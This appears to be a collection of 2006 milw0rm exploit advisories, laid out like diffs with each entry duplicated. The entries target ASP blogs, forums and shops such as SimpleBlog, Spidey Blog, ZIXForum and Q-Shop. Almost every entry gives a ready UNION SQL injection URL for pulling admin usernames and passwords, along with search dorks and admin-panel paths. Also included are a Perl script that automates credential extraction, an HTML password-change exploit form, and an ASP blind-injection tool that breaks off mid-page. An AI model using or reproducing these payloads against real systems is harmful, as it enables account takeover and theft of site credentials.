#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: admin@asianeagle.org #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke
Forever milw0rm ;)
# milw0rm.com [2006-08-14]

View file

@ -1,27 +1,27 @@
################################################################################
## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
# milw0rm.com [2006-08-20]
################################################################################
## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################
###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################
# milw0rm.com [2006-08-20]

View file

@ -1,27 +1,27 @@
################################################################################
## ##
## LBlog <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By LBlog ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################
#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################
# milw0rm.com [2006-08-20]
################################################################################
## ##
## LBlog <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By LBlog ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################
#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################
# milw0rm.com [2006-08-20]

View file

@ -1,16 +1,16 @@
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site : www.asianeagle.org
#Contact: admin@asianeagle.org
#Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script
#Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem.
# milw0rm.com [2006-09-03]
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site : www.asianeagle.org
#Contact: admin@asianeagle.org
#Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script
#Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem.
# milw0rm.com [2006-09-03]

View file

@ -1,74 +1,74 @@
_ _
__ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_|
|_| AnD
_ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net |
| App Version: <= 2.3 |
| App Type: Blog/Journal |
+-----------------------------------------------------------------+
| DETAILS |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri |
+-----------------------------------------------------------------+
| CODE |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. |
| |
| Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+
| EXPLOIT |
+-----------------------------------------------------------------+
| SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+
| SHOUTZ |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
+-----------------------------------------------------------------+
| PERSONAL STUFF |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+
__
___ ___ / _|
/ _ \/ _ \| |_
| __/ (_) | _|
\___|\___/|_|.
# milw0rm.com [2006-09-04]
_ _
__ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_|
|_| AnD
_ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net |
| App Version: <= 2.3 |
| App Type: Blog/Journal |
+-----------------------------------------------------------------+
| DETAILS |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri |
+-----------------------------------------------------------------+
| CODE |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. |
| |
| Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+
| EXPLOIT |
+-----------------------------------------------------------------+
| SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+
| SHOUTZ |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
+-----------------------------------------------------------------+
| PERSONAL STUFF |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+
__
___ ___ / _|
/ _ \/ _ \| |_
| __/ (_) | _|
\___|\___/|_|.
# milw0rm.com [2006-09-04]

View file

@ -1,23 +1,23 @@
################################################################################
## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# milw0rm.com [2006-09-05]
################################################################################
## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# milw0rm.com [2006-09-05]

View file

@ -1,13 +1,13 @@
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13]
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13]

View file

@ -1,21 +1,21 @@
Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
# milw0rm.com [2006-09-17]
Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
# milw0rm.com [2006-09-17]

View file

@ -1,28 +1,28 @@
*******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
With admin username and password take it,after join to login page:
../[path]/admin/
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]
*******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
With admin username and password take it,after join to login page:
../[path]/admin/
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]

View file

@ -1,23 +1,23 @@
*******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
Pls UserID Change(1,2,3,4,5.....)
# ajann,Turkey
# ...
# Im not [Turkish]Hacker!
# milw0rm.com [2006-09-17]
*******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
Pls UserID Change(1,2,3,4,5.....)
# ajann,Turkey
# ...
# Im not [Turkish]Hacker!
# milw0rm.com [2006-09-17]

View file

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High
+ Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High
+ Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19]

View file

@ -1,11 +1,11 @@
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir
# Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :)
# milw0rm.com [2006-09-22]
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir
# Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :)
# milw0rm.com [2006-09-22]

View file

@ -1,46 +1,46 @@
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]

View file

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High
Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256
# milw0rm.com [2006-09-24]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High
Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256
# milw0rm.com [2006-09-24]

View file

@ -1,38 +1,38 @@
<!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p>
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
Next to admin.asp
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-10-18]
<!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p>
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
Next to admin.asp
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-10-18]

View file

@ -1,189 +1,189 @@
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b>
Blind SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20"
string3="mdp%20"
string4="from%20"
string5="membre%20"
string6="where%20"
string7="ind like%20"
string8=Request.Form("id")
string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20"
string11="nom%20"
string12="from%20"
string13="membre%20"
string14="where%20"
string15="ind like%20"
string16=Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
get_password = take(target2)
getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
